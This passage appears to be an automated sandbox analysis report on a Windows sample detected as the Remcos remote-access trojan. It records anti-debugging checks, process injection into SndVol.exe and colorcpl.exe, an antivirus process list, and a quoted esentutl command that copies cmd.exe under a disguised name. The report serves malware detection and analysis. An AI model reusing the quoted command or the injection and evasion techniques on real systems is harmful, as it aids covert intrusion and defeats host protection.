              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913F7E2 Sleep,ExitProcess,8_2_2913F7E2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040F7E2 Sleep,ExitProcess,15_2_0040F7E2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077E04FF Sleep,ExitProcess,15_2_077E04FF
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_2914A7D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A7D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_077EB4F6
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 1038Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 8953Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 9.7 %
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 3.4 %
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768Thread sleep time: -3114000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768Thread sleep time: -26859000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C55908
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_29138847
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29137877 FindFirstFileW,FindNextFileW,8_2_29137877
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2917E8F9 FindFirstFileExA,8_2_2917E8F9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_2913BB6B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_29149B86
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_2913BD72
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_2914C322
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_2913C388
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_2913928E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_291396A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_0040928E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C322
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C388
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_004096A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_00408847
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00407877 FindFirstFileW,FindNextFileW,15_2_00407877
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0044E8F9 FindFirstFileExA,15_2_0044E8F9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0781F616 FindFirstFileExA,15_2_0781F616
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_077D9564
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D8594 FindFirstFileW,FindNextFileW,15_2_077D8594
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077DA3BD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_077ED03F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_077DD0A5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077D9FAB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_077DCA8F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077EA8A3 FindFirstFileW,15_2_077EA8A3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_077DC888
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_29137CD2
              Source: SndVol.exe, 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000003.1574996217.00000000025DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Selebzih.PIF, 0000000A.00000002.1688459414.0000000000753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsj
              Source: Selebzih.PIF, 0000000D.00000002.1793508839.000000000066A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeAPI call chain: ExitProcess graph end nodegraph_0-38353
              Source: C:\Windows\SysWOW64\SndVol.exeAPI call chain: ExitProcess graph end nodegraph_8-97824
              Source: C:\Users\Public\Libraries\Selebzih.PIFAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02C6F744
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_2916BB71
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02C6894C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04421120 mov eax, dword ptr fs:[00000030h]8_2_04421120
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04421120 mov eax, dword ptr fs:[00000030h]8_2_04421120
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04464072 mov eax, dword ptr fs:[00000030h]8_2_04464072
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29173355 mov eax, dword ptr fs:[00000030h]8_2_29173355
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00443355 mov eax, dword ptr fs:[00000030h]15_2_00443355
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D1120 mov eax, dword ptr fs:[00000030h]15_2_077D1120
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077D1120 mov eax, dword ptr fs:[00000030h]15_2_077D1120
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07814072 mov eax, dword ptr fs:[00000030h]15_2_07814072
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2917FBCD GetProcessHeap,8_2_2917FBCD
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_2916BB71
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29164BD8 SetUnhandledExceptionFilter,8_2_29164BD8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29164A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_29164A8A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_2916503C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_0043503C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00434A8A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB71
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00434BD8 SetUnhandledExceptionFilter,15_2_00434BD8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_078057A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_078057A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07805D59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_07805D59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780C88E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0780C88E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_078058F5 SetUnhandledExceptionFilter,15_2_078058F5

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4420000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 4421644Jump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 77D1644Jump to behavior
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000Jump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000Jump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_29142132
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_00412132
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29149662 mouse_event,8_2_29149662
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_044559D3 cpuid 8_2_044559D3
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C55ACC
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: GetLocaleInfoA,0_2_02C5A7C4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C55BD8
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: GetLocaleInfoA,0_2_02C5A810
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,8_2_2913F90C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_2917896D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_29181D58
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_29181FD0
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_29182143
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_2918201B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_291820B6
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_29182393
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_291825C3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_29178484
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_291824BC
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_29182690
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AA5ACC
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AA5BD7
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: GetLocaleInfoA,10_2_02AAA810
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_0045201B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_004520B6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00452143
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_00452393
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_00448484
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004524BC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_004525C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452690
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_0044896D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,15_2_0040F90C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451D58
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_00451FD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_0781968A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,15_2_077E0629
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_078233AD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_078232E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_078191A1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_078231D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,15_2_078230B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_07822E60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_07822DD3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_07822D38
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,15_2_07822CED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_07822A75
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5920C GetLocalTime,0_2_02C5920C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914B69E GetUserNameW,8_2_2914B69E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291793E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_291793E5
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5B78C GetVersionExA,0_2_02C5B78C
              Source: C:\Windows\SysWOW64\SndVol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
